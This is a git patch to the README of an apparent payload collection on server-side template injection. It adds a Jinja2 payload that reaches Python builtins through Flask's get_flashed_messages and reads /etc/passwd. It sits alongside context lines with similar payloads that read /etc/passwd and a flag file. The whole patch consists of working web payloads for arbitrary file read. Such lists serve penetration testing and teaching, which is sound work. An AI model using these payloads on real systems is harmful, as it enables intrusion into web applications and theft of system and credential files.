From 89429f9c4f302d33072d9f3ea28153ca3f95f9f5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E3=83=A0=E3=83=8F=E3=83=B3=E3=83=9E=E3=83=89?= Date: Mon, 18 Jan 2021 11:48:38 +0300 Subject: [PATCH] SSTI Payload in Jinja2 - Arbitrary file read --- Server Side Template Injection/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index e8ad1da..fc4e7c0 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -381,6 +381,8 @@ Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement # ''.__class__.__mro__[2].__subclasses__()[40] = File class {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }} +# https://github.com/pallets/flask/blob/master/src/flask/helpers.py#L398 +{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }} ``` ### Jinja2 - Write into remote file